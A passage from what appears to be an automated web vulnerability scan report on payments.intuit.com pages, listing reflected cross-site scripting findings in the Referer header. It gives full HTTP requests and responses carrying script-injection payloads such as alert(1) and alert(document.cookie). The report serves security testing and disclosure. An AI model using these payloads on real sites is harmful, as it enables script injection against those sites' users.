Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pD4WYGG-Cvv7karQOMmXBA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FDB4B0A0805192AA117E345F87602
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109428


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d';
                   </script>
...[SNIP]...

2.95. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3c927--><script>alert(1)</script>c31793869de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+O5vTWSpUYzZ0cAiwOULPg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96023F60A0805192AA117E3C0B449FB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109460

...[SNIP]...
<script>alert(1)</script>c31793869de | -->
...[SNIP]...

2.96. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/echecks-and-check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 88c20--><script>alert(1)</script>924f3a86d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rblhe1EyqVTlvVVwvVfbCg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9617F910A0805192AA117E356453B1F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145489

...[SNIP]...
<script>alert(1)</script>924f3a86d14 | -->
...[SNIP]...

2.97. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/echecks-and-check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8442e'-alert(1)-'9e35c41500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3N8dnzIcpHCCR4yazTOqzQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9616AE30A0805192AA117E35222B8A8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145455


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500';
                   </script>
...[SNIP]...

2.98. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/internet-merchant-accounts.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 13789--><script>alert(1)</script>c6658a6c597 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:20 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RHjF1WYshpdtziLMdwBPsw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:21 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FD8DC0A0805192AA117E3A718C091
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116417

...[SNIP]...
<script>alert(1)</script>c6658a6c597 | -->
...[SNIP]...

2.99. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/internet-merchant-accounts.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51516'-alert(1)-'1ab853b004d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:01 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UrCbcswIPLaXgenjtn1JyA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:02 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F8FAC0A0805192AA117E3E1625670
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116386


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d';
                   </script>
...[SNIP]...

2.100. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189b5'-alert(1)-'d3b08e9e2f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=nsY-E9JullWuK3Fo-MwMpA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96105730A0805192AA117E3D6C3D6DF
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116174


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1';
                   </script>
...[SNIP]...

2.101. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 18139--><script>alert(1)</script>e22e5c6761f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=iJGjLaqLPGZAre+7IVia6A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9612C450A0805192AA117E36B59CC68
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116206

...[SNIP]...
<script>alert(1)</script>e22e5c6761f | -->
...[SNIP]...

2.102. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f7c47--><script>alert(1)</script>3f78b487239 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ACIQv+A9wNRqvY9FGWFs9A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9615C020A0805192AA117E3B4FD864C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140415

...[SNIP]...
<script>alert(1)</script>3f78b487239 | -->
...[SNIP]...

2.103. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fb1c'-alert(1)-'0a97bbe41af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

